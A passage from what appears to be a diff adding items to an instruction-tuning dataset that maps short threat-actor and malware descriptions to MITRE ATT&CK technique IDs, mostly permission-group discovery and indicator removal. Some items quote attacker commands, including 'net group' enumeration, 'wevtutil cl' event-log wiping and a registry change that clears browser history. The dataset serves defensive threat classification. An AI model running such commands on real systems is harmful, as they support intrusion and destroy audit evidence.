the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AppleSeed has the ability to use JavaScript to execute PowerShell.", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "jRAT has been distributed as HTA files with JScript.", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire can exploit vulnerabilities such as MS16-032 and MS16-135.", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT29 used the \"\"Get-ManagementRoleAssignment\"\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.\"", + "output": "- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT3 has a tool that can enumerate the permissions associated with Windows groups.", + "output": "- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IcedID has the ability to identify Workgroup membership.", + "output": "- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MURKYTOP has the capability to retrieve information about groups.", + "output": "- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PUNCHBUGGY can gather domain and workgroup information.", + "output": "- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"UNC2452 used the \"\"Get-ManagementRoleAssignment\"\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.\"", + "output": "- T1069: Permission Groups Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Commands such as \"\"net group\"\" and \"\"net localgroup\"\" can be used in Net to gather information about and manipulate groups.\"", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance.", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JPIN can obtain the permissions of the victim user.", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Kwampirs collects a list of users belonging to the local users and administrators groups with the commands \"\"net localgroup administrators\"\" and \"\"net localgroup users\"\".\"", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"OilRig has used \"\"net localgroup administrators\"\" to find local administrators on compromised systems.\"", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Tonto Team has used the \"\"ShowLocalGroupDetails\"\" command to identify administrator, user, and guest accounts on a compromised host.\"", + "output": "- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain.", + "output": "- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"\"net group Exchange Trusted Subsystem /domain\"\" and \"\"net group domain admins /domain\"\".\"", + "output": "- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has used the AD Explorer tool to enumerate groups on a victim's network.", + "output": "- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Turla has used \"\"net group \"\"Domain Admins\"\" /domain\"\" to identify domain administrators.\"", + "output": "- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Wizard Spider has used \"\"AdFind.exe\"\" to collect information about Active Directory groups and accounts.\"", + "output": "- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AADInternals can enumerate Azure AD groups.", + "output": "- T1069.003: Permission Groups Discovery - Cloud Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ROADTools can enumerate Azure AD groups.", + "output": "- T1069.003: Permission Groups Discovery - Cloud Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 used SDelete to remove artifacts from victims.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bankshot deletes all artifacts associated with the malware from the infected machine.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bazar's loader can delete scheduled tasks created by a previous instance of the malware.", + "output": "- T1070: Indicator Removal\n- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"BlackEnergy has removed the watermark associated with enabling the \"\"TESTSIGNING\"\" boot configuration option by removing the relevant strings in the \"\"user32.dll.mui\"\" of the system.\"", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Donut can erase file references to payloads in-memory after being reflectively loaded and executed.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"EVILNUM has a function called \"\"DeleteLeftovers\"\" to remove certain artifacts of the attack.\"", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Goopy has the ability to delete emails used for C2 once the content has been copied.", + "output": "- T1070: Indicator Removal\n- T1070.008: Indicator Removal - Clear Mailbox Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GrimAgent can delete previously created tasks on a compromised host.", + "output": "- T1070: Indicator Removal\n- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KOCTOPUS can delete created registry keys as part of its cleanup procedure.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Maze has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Misdat is capable of deleting Registry keys used for persistence.", + "output": "- T1070: Indicator Removal\n- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Privacy` Registry key.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Orz can overwrite Registry settings to reduce its visibility on the victim.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pillowmint can uninstall the malicious service from an infected machine.", + "output": "- T1070: Indicator Removal\n- T1070.009: Indicator Removal - Clear Persistence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rising Sun can clear a memory blog in the process by overwriting it with junk bytes.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ShadowPad has deleted arbitrary Registry values.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"UNC2452 removed evidence of email export requests using \"\"Remove-MailboxExportRequest\"\". They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.\"", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "njRAT is capable of manipulating and deleting registry keys.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has cleared select event log entries.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Wocao, the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indrik Spider has used Cobalt Strike to empty log files.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KillDisk deletes Application, Security, Setup, and System Windows Event Logs.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RunningRAT contains code to clear event logs.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a 